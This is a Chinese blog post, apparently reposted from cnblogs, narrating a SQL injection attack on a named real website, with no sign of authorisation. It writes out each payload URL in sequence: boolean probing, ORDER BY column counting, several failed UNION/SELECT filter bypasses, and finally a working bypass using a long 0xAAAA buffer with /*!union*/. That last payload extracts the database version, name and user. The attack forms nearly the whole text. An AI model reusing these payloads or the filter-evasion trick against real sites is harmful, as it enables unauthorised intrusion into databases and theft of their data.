一个突破SQL注入关键词过滤的另类方法

SQL注入技巧与突破
本文详细介绍了通过多种方法突破SQL注入过滤限制的过程,包括利用特殊字符、绕过UNION+SELECT等技巧,并最终借助国外黑客论坛成功解决问题。分享了从常规手法到高级技巧的实践过程,展示了SQL注入攻击的复杂性和应对策略。

前几今天遇到一个bt 的注射点(此注入点使用目前流行的注射工具都射不了):

http://xuehai.net/index.php?content=more_product&id=17
http://xuehai.net/index.php?content=more_product&id=17 and 1=1 正常
http://xuehai.net/index.php?content=more_product&id=17 and 1=2 报错

如图:

突破SQL注入过滤限制

突破SQL注入过滤限制

http://xuehai.net/index.php?content=more_product&id=17 order by 6 正常
http://xuehai.net/index.php?content=more_product&id=17 order by 7 错误

如图:

突破SQL注入过滤限制

突破SQL注入过滤限制

继续按照常规的手法注射:

http://xuehai.net/index.php?content=more_product&id=-17+UNION+SELECT+1,2,3,4,5,6–

如图:

突破SQL注入过滤限制

突破SQL注入过滤限制

错误nnd,过滤了UNION+SELECT 我们来加点特殊的字符看看能不能绕过:

http://xuehai.net/index.php?content=more_product&id=-17+/**//**//*!uNiOn*//**//**//*!sElEcT*//**//**/1,2,3,4,5,6–

如图:

突破SQL注入过滤限制

突破SQL注入过滤限制

悲剧还是绕不过去 – -,于是尝试自己知道的绕过方法继续射…

http://xuehai.net/index.php?content=more_product&id=-17+/*U*//*n*//*i*//*o*//*n*//*t*/+/*s*//*e*//*l*//*e*//*c*//*t*/+1,2,3,4,5,6–

如图:

突破SQL注入过滤限制

突破SQL注入过滤限制

继续:

http://xuehai.net/index.php?content=more_product&id=-17+concat(u,n,i,o,n)+concat(s,e,l,e,c,t)+all+1,2,3,4,5,6–

如图:

突破SQL注入过滤限制

突破SQL注入过滤限制

悲剧还是绕不过去,nnd。找了几个朋友看了还是绕不过去邪恶的过滤啊。要是国内的站以上几种方法一般都能搞定,老外就是bt。最后实在木有办法了只好去国外的黑客论坛求助老外帮助。国外php 注射历史悠久手法独特+方法猥琐 射出几率相当高于是发帖求助了终于有一个黑客回帖了而且轻松的绕过去了。

http://xuehai.net/index.php?content=more_product&id=-17 and (select 1)=(select0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)+/*!union*/+select+1,2,3,4,5,6–+-

如图:

突破SQL注入过滤限制

突破SQL注入过滤限制

靠,老外果然牛B 那么继续射

http://xuehai.net/index.php?content=more_product&id=-17 and (select 1)=(select0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)+/*!union*/+select+1,concat_ws(0x7c,version(),database(),user()),3,4,5,6–+-

如图:成功得到系统版本、当前数据库用户、用户名

突破SQL注入过滤限制

突破SQL注入过滤限制

至此终于成功突破SQL注入过滤Union+SELECT。

转载于:https://www.cnblogs.com/alocne/archive/2012/03/24/2415531.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值